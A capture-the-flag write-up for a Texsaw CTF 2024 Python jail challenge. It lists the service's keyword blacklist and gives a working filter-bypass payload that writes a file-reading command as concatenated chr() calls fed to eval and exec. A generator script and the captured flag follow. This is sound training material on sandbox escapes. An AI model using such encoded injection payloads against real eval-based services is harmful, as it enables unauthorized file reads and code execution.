Texsaw CTF 2024

Prison Italiano [200 pts]

You’ve been locked in the worst prison imaginable: one without any meatballs! To escape the prison, you must read the flag using Python!

nc 3.23.56.243 9011


After playing around with it a bit, and getting various errors, here’s what I got:

blacklist: import, dir, print, open, ', ", os, sys, _, eval, exec, =, [, ]

prohibited actions:
    function calls without parameters, i.e. '()'

code fragments:
    inp = eval(inp)
    inp = inp.replace("print", "stdout.write")
    out = exec(inp)

The code fragments are the most important here. Notably, the input is evaluated first before it is executed… let’s test if a function like chr() works.

Turns out, it does! That means we can just write every character as a chr(some number), which will allows us to print the file. Here’s a little script that helps us write our payload:

payload = 'print(open("flag.txt","r").read())'
for i in payload:
    print(f'chr({ord(i)})+', end='')

And here’s our final payload:

chr(112)+chr(114)+chr(105)+chr(110)+chr(116)+chr(40)+chr(111)+chr(112)+chr(101)+chr(110)+chr(40)+chr(34)+chr(102)+chr(108)+chr(97)+chr(103)+chr(46)+chr(116)+chr(120)+chr(116)+chr(34)+chr(44)+chr(34)+chr(114)+chr(34)+chr(41)+chr(46)+chr(114)+chr(101)+chr(97)+chr(100)+chr(40)+chr(41)+chr(41)
texsaw{SP4P3GGY_4ND_M34TBA11S_aa17c6d30ee3942d}